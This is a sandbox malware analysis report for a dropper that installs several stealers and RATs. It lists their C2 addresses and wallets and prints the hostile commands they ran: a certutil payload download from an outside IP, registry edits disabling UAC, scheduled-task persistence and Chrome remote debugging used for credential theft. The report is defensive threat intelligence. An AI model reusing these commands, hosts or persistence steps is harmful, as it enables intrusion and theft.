Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

27/02/2025, 06:33

250227-hbn4tszmx7 10

26/02/2025, 23:57

250226-3zn4ysxwc1 10

26/02/2025, 23:14

250226-271x2sxmz9 10

14/02/2025, 01:10

250214-bjsnnayne1 10

14/02/2025, 01:00

250214-bc5pmsymhw 10

13/02/2025, 05:01

250213-fnkwtstpgw 10

13/02/2025, 04:24

250213-e1kk6atmaz 10

13/02/2025, 04:08

250213-eqe8patkgx 8

12/02/2025, 23:56

250212-3yzt3azrdx 10

Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/11/2024, 19:26

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    753f85d83d

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

103.42.55.251:8080

Extracted

Family

lumma

C2

https://powerful-avoids.sbs

https://motion-treesz.sbs

https://disobey-curly.sbs

https://leg-sate-boat.sbs

https://story-tense-faz.sbs

https://blade-govern.sbs

https://occupy-blushi.sbs

https://frogs-severz.sbs

https://push-hook.cyou

Extracted

Family

phorphiex

C2

http://185.215.113.84

Extracted

Family

redline

C2

38.180.109.140:20007

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

7U2HW8ZYjc9H

Attributes
  • delay

    3

  • install

    true

  • install_file

    Discord.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

redline

Botnet

814FA

C2

88.99.151.68:7200

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://push-hook.cyou/api

https://blade-govern.sbs/api

https://story-tense-faz.sbs/api

https://disobey-curly.sbs/api

https://motion-treesz.sbs/api

https://powerful-avoids.sbs/api

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • XMRig Miner payload 4 IoCs
  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 6 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Loads dropped DLL
    PID:1208
    • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
      "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\sysnldcvmr.exe
          C:\Windows\sysnldcvmr.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:236
          • C:\Users\Admin\AppData\Local\Temp\1321710862.exe
            C:\Users\Admin\AppData\Local\Temp\1321710862.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2964
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:604
              • C:\Windows\system32\reg.exe
                reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                7⤵
                  PID:2236
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2368
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /f /tn "Windows Upgrade Manager"
                  7⤵
                    PID:3064
              • C:\Users\Admin\AppData\Local\Temp\110673311.exe
                C:\Users\Admin\AppData\Local\Temp\110673311.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2344
                • C:\Users\Admin\AppData\Local\Temp\2063426219.exe
                  C:\Users\Admin\AppData\Local\Temp\2063426219.exe
                  6⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:852
              • C:\Users\Admin\AppData\Local\Temp\3131330974.exe
                C:\Users\Admin\AppData\Local\Temp\3131330974.exe
                5⤵
                • Executes dropped EXE
                PID:2824
              • C:\Users\Admin\AppData\Local\Temp\367219602.exe
                C:\Users\Admin\AppData\Local\Temp\367219602.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2848
                • C:\Users\Admin\AppData\Local\Temp\3866813154.exe
                  C:\Users\Admin\AppData\Local\Temp\3866813154.exe
                  6⤵
                  • Executes dropped EXE
                  PID:1072
          • C:\Users\Admin\AppData\Local\Temp\Files\abc.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\abc.exe"
            3⤵
            • Executes dropped EXE
            PID:1048
          • C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2608
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:304
          • C:\Users\Admin\AppData\Local\Temp\Files\dkasjhajksdhdjkas.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\dkasjhajksdhdjkas.exe"
            3⤵
            • Executes dropped EXE
            PID:3052
          • C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2520
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\177.tmp\178.tmp\179.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1596
              • C:\Windows\system32\mshta.exe
                mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
                5⤵
                • Access Token Manipulation: Create Process with Token
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2400
                • C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
                  "C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:624
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\242.tmp\243.tmp\244.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
                    7⤵
                    • Enumerates connected drives
                    PID:1260
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
                      8⤵
                      • UAC bypass
                      PID:2824
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
                      8⤵
                      • UAC bypass
                      PID:2840
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
                      8⤵
                      • UAC bypass
                      PID:2844
                    • C:\Windows\system32\attrib.exe
                      attrib +s +h e:\net
                      8⤵
                      • Sets file to hidden
                      • Views/modifies file attributes
                      PID:336
                    • C:\Windows\system32\certutil.exe
                      certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat
                      8⤵
                        PID:2832
            • C:\Users\Admin\AppData\Local\Temp\Files\test10.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\test10.exe"
              3⤵
              • Executes dropped EXE
              PID:2756
            • C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2796
              • C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\vg9qcBa.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:2640
            • C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\MePaxil.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2976
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /k move Offensive Offensive.cmd & Offensive.cmd & exit
                4⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1760
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  5⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2804
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "wrsa.exe opssvc.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1620
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2996
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2168
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 543648
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:840
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "BiddingVeRoutinesFilms" Bowling
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2724
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Suzuki + ..\Major + ..\Tit + ..\Adjust + ..\Invest + ..\Severe + ..\Sony + ..\Prefers E
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1636
                • C:\Users\Admin\AppData\Local\Temp\543648\Legend.pif
                  Legend.pif E
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:112
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:2208
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks.exe /create /tn "Keyboard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1644
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks.exe /create /tn "ScanGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\ThreatGuard Innovations\ScanGuard.js'" /sc onlogon /F /RL HIGHEST
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1920
                  • C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe
                    C:\Users\Admin\AppData\Local\Temp\543648\RegAsm.exe
                    6⤵
                    • Executes dropped EXE
                    PID:2900
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 15
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2184
            • C:\Users\Admin\AppData\Local\Temp\Files\up.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\up.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks SCSI registry key(s)
              • Suspicious use of SetWindowsHookEx
              PID:1580
            • C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:2164
            • C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1636
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1772
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:568
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp950F.tmp.bat""
                4⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2204
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 3
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:2784
                • C:\Users\Admin\AppData\Roaming\Discord.exe
                  "C:\Users\Admin\AppData\Roaming\Discord.exe"
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2264
            • C:\Users\Admin\AppData\Local\Temp\Files\random.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:1804
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                4⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Suspicious use of AdjustPrivilegeToken
                PID:2892
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec9778
                  5⤵
                    PID:2992
                  • C:\Windows\system32\ctfmon.exe
                    ctfmon.exe
                    5⤵
                      PID:3012
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:2
                      5⤵
                        PID:2948
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:8
                        5⤵
                          PID:3024
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:8
                          5⤵
                            PID:1944
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2256 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:1544
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1344,i,9771590525661999791,11264296466303133177,131072 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:2972
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DocumentsIEHDAFHDHC.exe"
                          4⤵
                          • Loads dropped DLL
                          PID:1028
                          • C:\Users\Admin\DocumentsIEHDAFHDHC.exe
                            "C:\Users\Admin\DocumentsIEHDAFHDHC.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:1788
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Adds Run key to start application
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              PID:3008
                              • C:\Users\Admin\AppData\Local\Temp\1009118001\x4lburt.exe
                                "C:\Users\Admin\AppData\Local\Temp\1009118001\x4lburt.exe"
                                7⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:2844
                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2976
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                    9⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • System Location Discovery: System Language Discovery
                                    PID:2724
                              • C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe
                                "C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2112
                                • C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1009238001\vg9qcBa.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:2320
                              • C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe
                                "C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Checks processor information in registry
                                PID:316
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  8⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1780
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
